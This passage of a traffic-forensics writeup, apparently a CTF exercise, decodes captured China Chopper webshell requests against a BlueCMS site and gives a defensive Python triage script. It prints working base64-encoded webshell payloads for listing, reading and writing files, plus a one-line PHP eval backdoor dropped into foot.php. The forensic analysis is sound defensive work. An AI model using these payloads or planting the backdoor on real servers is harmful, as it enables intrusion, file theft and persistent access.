Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\
// List every file in the C:\\phpstudy\\WWW\\bluecms\\data\\ directory on the target server

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
// Read the contents of the file C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
->|<?php eval($_POST['cmd_shell']);?>|<

Another usable search key is the delimiter that China Chopper (菜刀) wraps around its own command output to separate it from the HTML the page itself emits, for example: ->|
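The requests above all follow the same shape: the password parameter (here `Bshell`) carries a stager, `z0` carries base64-encoded PHP, `z1` a base64-encoded path and, for writes, `z2` the hex-encoded file body, while the response wraps the shell's output in `->|` and `|<-`. The script below is an added example for this writeup, not the author's script or any competition tooling; it assumes the POST bodies have already been pulled out of the pcap (for instance with the tcpdump pipeline earlier on the page) and triages each one from the defender's side: which file-system action was requested, on which path, and whether a written file is itself a new shell. The three sample bodies are copied from the capture shown above; the sample HTTP response is constructed for the example.

```python
"""Decode and triage China Chopper (菜刀) POST bodies from an HTTP dump.

Added example for this writeup, not the author's own script.  Input is
one raw request body per string, as extracted from the capture.
"""
import base64
import re
from urllib.parse import unquote

# Markers the client wraps around its own output so it can cut it out of
# whatever HTML the compromised page prints before and after it.
OUT_START, OUT_END = "->|", "|<-"


def lenient_b64decode(s: str) -> bytes:
    """Decode base64 that may have lost its padding or its tail in capture
    (the truncated z1 value 'QzpcXHBocHN0dW' on this page is one such case)."""
    s = re.sub(r"[^A-Za-z0-9+/]", "", s)
    if len(s) % 4 == 1:            # a lone trailing sextet cannot form a byte
        s = s[:-1]
    return base64.b64decode(s + "=" * (-len(s) % 4))


def parse_body(body: str) -> dict:
    """Split an x-www-form-urlencoded body by hand.

    urllib's parse_qs would turn '+' into a space, but the captured base64
    in z0 carries literal '+' characters, so only %XX escapes are undone.
    """
    fields = {}
    for pair in body.strip().split("&"):
        key, _, value = pair.partition("=")
        fields[key] = unquote(value)
    return fields


def decode_request(body: str) -> dict:
    """Classify one request by the PHP the operator sent in z0."""
    fields = parse_body(body)
    # The first field is the shell's password parameter; it carries the
    # stager that evals the base64 in z0.
    password = next(iter(fields))
    php = lenient_b64decode(fields.get("z0", "")).decode("utf-8", "replace")
    path = None
    if "z1" in fields:
        path = lenient_b64decode(fields["z1"]).decode("utf-8", "replace")
    if "opendir(" in php:
        action = "list_dir"
    elif "fwrite(" in php:
        action = "write_file"
    elif "fread(" in php:
        action = "read_file"
    else:
        action = "other"
    content = None
    if action == "write_file" and "z2" in fields:
        # z2 is the new file body, hex-encoded two characters per byte.
        content = bytes.fromhex(fields["z2"]).decode("utf-8", "replace")
    # A written file that itself calls eval() is a dropped secondary shell.
    drops_shell = bool(content) and "eval(" in content
    return {"password": password, "action": action, "path": path,
            "content": content, "drops_shell": drops_shell}


def extract_output(http_response: str):
    """Return the text between ->| and |<- in a response, or None."""
    start = http_response.find(OUT_START)
    if start < 0:
        return None
    start += len(OUT_START)
    end = http_response.find(OUT_END, start)
    return http_response[start:] if end < 0 else http_response[start:end]


def triage(bodies):
    """One (action, path) tuple per request, in capture order."""
    return [(r["action"], r["path"]) for r in map(decode_request, bodies)]


# Sample request bodies, copied from the capture shown on this page.
LIST_REQ = (
    "Bshell=@eval(base64_decode($_POST[z0]));&z0="
    "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7"
    "&z1=QzpcXHBocHN0dW"
)
READ_REQ = (
    "Bshell=@eval(base64_decode($_POST[z0]));&z0="
    "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw=="
    "&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA="
)
WRITE_REQ = (
    "Bshell=@eval(base64_decode($_POST[z0]));&z0="
    "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw=="
    "&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw"
    "&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E"
)

# Constructed response for the example: page HTML around the shell output.
SAMPLE_RESPONSE = ("<html><body>site header</body>->|"
                   "<?php eval($_POST['cmd_shell']);?>|<-site footer</html>")

if __name__ == "__main__":
    for action, path in triage([LIST_REQ, READ_REQ, WRITE_REQ]):
        print(action, path)
    print(extract_output(SAMPLE_RESPONSE))
```

Splitting the body by hand rather than with `parse_qs` matters: the captured `z0` values contain literal `+` characters, and a form parser would turn them into spaces before the base64 is decoded. The truncated `z1` in the first request decodes to `C:\\phpstu`, matching what the writeup shows, because the lenient decoder pads what it has instead of rejecting it.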

At this point the analysis is essentially complete.
